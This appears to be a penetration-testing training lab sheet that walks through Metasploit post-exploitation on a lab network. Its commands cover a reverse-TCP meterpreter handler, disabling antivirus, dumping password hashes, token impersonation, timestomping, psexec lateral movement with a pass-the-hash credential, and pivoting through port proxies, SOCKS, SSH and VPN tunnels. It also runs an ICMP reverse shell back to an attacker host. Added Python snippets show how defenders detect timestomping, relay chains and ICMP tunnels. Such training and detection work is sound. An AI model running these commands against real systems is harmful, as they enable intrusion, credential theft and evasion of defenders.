Lab 11a: Getting your shell
echo yourname > /home/strategicsec/yourname.txt
cd /home/strategicsec/toolz/metasploit
./msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set ExitOnSession true
set LHOST StrategicSec-Ubuntu-Tap0-IP
set LPORT 7777
Strategic Security, Inc. © http://strategicsec.com/
exploit -j
Now you should only have to wait a few minutes, and then you should see an incoming Meterpreter session.
We'll simulate having spear-phished a victim.
After that you should see Metasploit sending the exploit to the IP address of a Windows 7 host, and then a new session being created.
You can list the active sessions by typing:
sessions -l
You can "interact" with any active session by typing sessions -i 3 (replace 3 with the number of the session you want to interact with).
sessions -i 1
You should now see Metasploit's meterpreter prompt.
Lab 11b: Figure out who and where you are
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ipconfig
meterpreter > run post/windows/gather/checkvm
meterpreter > run get_local_subnets
Lab 11c: Escalate privileges and get hashes
meterpreter > getsystem
meterpreter > getuid
meterpreter > run killav
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > rev2self
meterpreter > getuid
Lab 11d: Enumerate the host you are on
meterpreter > run getcountermeasure
meterpreter > run winenum
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp
meterpreter > reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Lab 11e: Steal Tokens
meterpreter > getsystem
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > list_tokens -g
meterpreter > impersonate_token BUILTIN\\Users <-- choose who you want to impersonate, but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
meterpreter > getuid
meterpreter > rev2self
Lab 11f: Prove access
meterpreter > upload /home/strategicsec/yourname.txt c:\\
meterpreter > timestomp C:\\yourname.txt -v
meterpreter > timestomp C:\\yourname.txt -m "12/12/2013 12:12:13"
meterpreter > timestomp C:\\yourname.txt -v
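The timestomp step above rewrites the file's $STANDARD_INFORMATION timestamps but not its $FILE_NAME attribute, and a time given as a whole second leaves the 100 ns fraction at zero. The Python below is an added defender's check, not part of the lab, that scans constructed MFT-style records for both indicators; the record layout and the paths are assumptions.

```python
from datetime import datetime

# Constructed MFT-style records (not from a real disk image). Each carries the
# $STANDARD_INFORMATION and $FILE_NAME modified times with 100 ns precision,
# as an MFT parser would export them.
RECORDS = [
    {"path": r"C:\Windows\System32\kernel32.dll",
     "si_modified": "2013-07-26 02:55:17.2741530",
     "fn_modified": "2013-07-26 02:55:17.2741530"},
    {"path": r"C:\yourname.txt",  # the lab file after timestomp -m
     "si_modified": "2013-12-12 12:12:13.0000000",
     "fn_modified": "2014-03-04 09:41:55.6120337"},
]


def parse_ts(text):
    """Split 'YYYY-MM-DD HH:MM:SS.fffffff' into a datetime and the raw
    100 ns digits (datetime itself only keeps microseconds)."""
    head, frac = text.split(".")
    return datetime.strptime(head, "%Y-%m-%d %H:%M:%S"), frac


def timestomp_indicators(rec):
    """Return the reasons a record looks timestomped (empty list = clean)."""
    si, si_frac = parse_ts(rec["si_modified"])
    fn, _ = parse_ts(rec["fn_modified"])
    reasons = []
    if int(si_frac) == 0:
        reasons.append("zero sub-second part in $STANDARD_INFORMATION")
    if si < fn:
        # $FILE_NAME is only written by the kernel on create/rename/move,
        # so an $SI time earlier than $FN does not arise from normal use.
        reasons.append("$STANDARD_INFORMATION older than $FILE_NAME")
    return reasons


def scan(records):
    """Map each suspicious path to its list of indicators."""
    hits = {}
    for rec in records:
        reasons = timestomp_indicators(rec)
        if reasons:
            hits[rec["path"]] = reasons
    return hits
```

A zeroed fraction on its own is weak evidence, since files copied from FAT media keep their 2-second timestamps; the $SI/$FN ordering is the stronger signal.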
Lab 11g: Enumerate the network you are on
meterpreter > run netenum
meterpreter > run netenum -ps -r 10.10.30.0/24
meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24
Lab 11h: Set up your Pivot
meterpreter > background <-- background the session; you want to get back to the msf prompt
msf exploit(handler) > back <-- you need to get back to the main msf > prompt
sessions -l <-- find a session you want to pivot through (note the IP and session number)
Lab 11i: Now set up Pivot with a route add
route print
route add 10.10.30.50 255.255.255.0 28 <-- use the correct session id (2); it may be 3 or 4
route print
route remove 10.10.30.50 255.255.255.0 28 <-- use the correct session id (2); it may be 3 or 4
route print <-- verify the new route
Lab 11j: Scan through your Pivot
use auxiliary/scanner/portscan/tcp <-- run aux modules through your pivot
set THREADS 10
set RHOSTS 10.10.30.60-70 <-- keep changing this IP range and re-running the scan until you find something you want to attack
set PORTS 445
run
Lab 11k: Lateral movement through your Pivot
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set payload windows/meterpreter/reverse_tcp
set RHOST 10.10.30.63
set LHOST 10.10.5.235
set LPORT 5678
exploit
Lab 11l: Pivot Persistence
*** Update the Metasploit installation
*** Make two meterpreter sessions
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set RHOST 10.10.30.87
set LPORT 5678
set LHOST StrategicSec-Ubuntu-Tap0-IP
exploit
background
set RHOST 10.10.30.81
exploit
background
use post/windows/manage/portproxy
sessions -l
set session 2
set local_port 9001
set local_address 0.0.0.0
set connect_port 9002
set connect_address 10.10.30.87
run
set session 1
set local_port 9002
set local_address 0.0.0.0
set connect_port 80
set connect_address 10.10.10.105
run
Test the proxy:
wget --server-response --spider 10.10.30.81:9001
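The two portproxy rules above chain 10.10.30.81:9001 to 10.10.30.87:9002 and on to 10.10.10.105:80, and each rule persists in its host's PortProxy configuration, where netsh interface portproxy show all lists it. The Python below is an added defender's example, not from the lab, that parses constructed output of that command from both pivot hosts, lists the relay rules and walks the chain from its entry point; the table layout is assumed to match netsh's, and the addresses are the lab's.

```python
import re

# Constructed `netsh interface portproxy show all` output from the two pivot
# hosts, laid out as netsh prints it (sample data, not a real capture).
PORTPROXY_TABLES = {
    "10.10.30.81": """\
Listen on ipv4:             Connect to ipv4:
Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         9001        10.10.30.87     9002
""",
    "10.10.30.87": """\
Listen on ipv4:             Connect to ipv4:
Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         9002        10.10.10.105    80
""",
}

# listen_addr listen_port connect_addr connect_port; header rows carry no digits
RULE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text):
    """Return [(listen_addr, listen_port, connect_addr, connect_port), ...]."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            la, lp, ca, cp = m.groups()
            rules.append((la, int(lp), ca, int(cp)))
    return rules


def relay_rules(tables):
    """Rules that hand traffic to another host: each one is a possible pivot."""
    found = []
    for host, text in tables.items():
        for la, lp, ca, cp in parse_portproxy(text):
            if ca not in ("127.0.0.1", host):
                found.append((host, lp, ca, cp))
    return found


def follow_chain(tables, host, port, max_hops=8):
    """Walk the relays hop by hop until a host has no matching rule."""
    path = [(host, port)]
    for _ in range(max_hops):
        nxt = [(ca, cp) for la, lp, ca, cp in parse_portproxy(tables.get(host, ""))
               if lp == port and la in ("0.0.0.0", host)]
        if not nxt or nxt[0] in path:  # end of chain, or a loop
            break
        host, port = nxt[0]
        path.append((host, port))
    return path
```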
Lab 11m: Set up a Socks Proxy through your Pivot
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run
Open a new terminal
sudo vi /etc/proxychains.conf
Comment out the proxy_dns line, change the 9050 (Tor port) in the last line to the Metasploit SOCKS proxy port (1080), and save it. The last line should then read:
socks4 127.0.0.1 1080
proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.10.30.0/24
proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.10.30.0/24
Lab 11n: SSH Tunneling
sudo vi /etc/proxychains.conf
Change the last line to: socks4 127.0.0.1 9060
Check the proxychains connection with: proxychains wget 10.10.10.105 (this is expected to fail for now, since the SSH tunnel is not up yet)
Connect over SSH, opening a dynamic (SOCKS) forward on port 9060:
ssh -D 127.0.0.1:9060 [email protected]
pass: mysql123
Open a new terminal and check the connection again.
Lab 11o: VPN Pivot
use exploit/multi/ssh/sshexec
set PASSWORD mysql123
set RHOST 10.10.10.107
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.5.235
set LPORT 4444
exploit
meterpreter > portfwd add -l 2222 -p 22 -r 127.0.0.1
meterpreter > background
route add 10.10.10.0 255.255.255.0 1
sudo apt-get install sshuttle
sudo sshuttle -vr [email protected]:2222 0/0
password: mysql123
Test the connection with http://www.whatismyip.com/
Lab 11p: ICMP Tunneling
Open msfconsole:
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhost 10.10.30.63
set lhost 10.10.5.235
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
exploit
Open a second console:
cd ~/toolz
git clone https://github.com/inquisb/icmpsh.git
cd icmpsh
From the meterpreter session:
meterpreter > getwd
C:\Windows\system32
meterpreter > getlwd
/home/strategicsec/toolz/metasploit
meterpreter > lcd ../icmpsh
meterpreter > getlwd
/home/strategicsec/toolz/icmpsh
meterpreter > upload icmpsh.exe
[*] uploading : icmpsh.exe -> icmpsh.exe
[*] uploaded : icmpsh.exe -> icmpsh.exe
meterpreter > shell
C:\Windows\system32>icmpsh.exe -t 10.10.5.235 -d 500 -b 30 -s 128
Exit the shell and the meterpreter session, then return to the second console:
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
sudo python icmpsh_m.py 10.10.5.235 10.10.30.63
ipconfig <-- typed into the ICMP shell once it connects
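icmpsh, as configured above, sends an echo request every 500 ms (-d 500) and carries the shell's input and output in payloads of up to 128 bytes (-s 128), so its traffic looks nothing like a four-packet ping. The Python below is an added detection sketch, not part of the lab or of icmpsh, that scores constructed echo-request records by cadence regularity and payload-size variation; the log layout and the thresholds are assumptions.

```python
from collections import defaultdict
from statistics import pstdev

# Constructed echo-request log: (timestamp in s, src, dst, payload bytes).
# Not captured traffic. The first flow mimics icmpsh.exe beaconing every
# 500 ms with payloads that change size as shell data moves; the second is
# an ordinary Windows ping (four 32-byte requests, one per second).
ECHO_REQUESTS = (
    [(1.0 + 0.5 * i, "10.10.30.63", "10.10.5.235", 8 + (37 * i) % 120)
     for i in range(40)]
    + [(5.0 + i, "10.10.30.70", "10.10.30.1", 32) for i in range(4)]
)


def group_flows(requests):
    """Group samples by (src, dst) pair, keeping (timestamp, size)."""
    flows = defaultdict(list)
    for ts, src, dst, size in requests:
        flows[(src, dst)].append((ts, size))
    return flows


def tunnel_score(samples, min_count=20):
    """Describe a flow: volume, cadence regularity and payload-size spread."""
    if len(samples) < min_count:
        return None
    samples = sorted(samples)
    ts = [t for t, _ in samples]
    sizes = [s for _, s in samples]
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    return {
        "count": len(samples),
        "mean_gap_s": round(sum(gaps) / len(gaps), 3),
        "gap_stdev_s": round(pstdev(gaps), 3),
        "size_stdev": round(pstdev(sizes), 1),
        # 32 bytes is the Windows ping default payload, 56 the Linux one
        "standard_ping_size": set(sizes) <= {32, 56},
    }


def suspicious_icmp_flows(requests, max_gap_stdev=0.1):
    """Flag long-lived, metronomic echo-request streams with odd payloads."""
    hits = {}
    for pair, samples in group_flows(requests).items():
        score = tunnel_score(samples)
        if (score and score["gap_stdev_s"] <= max_gap_stdev
                and not score["standard_ping_size"]):
            hits[pair] = score
    return hits
```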
Lab 11q: IPv6 to IPv4 Tunnel
Go to http://tunnelbroker.net and sign up for an account.
You will be emailed your account credentials.
route print
netsh interface ipv6 show interfaces
Then, at the netsh interface ipv6 prompt:
add v6v4tunnel IP6Tunnel 192.168.1.9 216.218.224.42
add address IP6Tunnel 2001:470:1f0e:d9f::2
add route ::/0 IP6Tunnel 2001:470:1f0e:d9f::1
Reference:
http://www.cellstream.com/intranet/tipsandtricks/160-setting-up-a-6to4-tunnel-in-windows-7.html
IPv6 Direct Access
Reference:
http://www.slideshare.net/AlexdeJong/direct-access-for-dummies
http://directaccess.richardhicks.com/2013/06/24/isatap-recommendations-for-directaccess-deployments/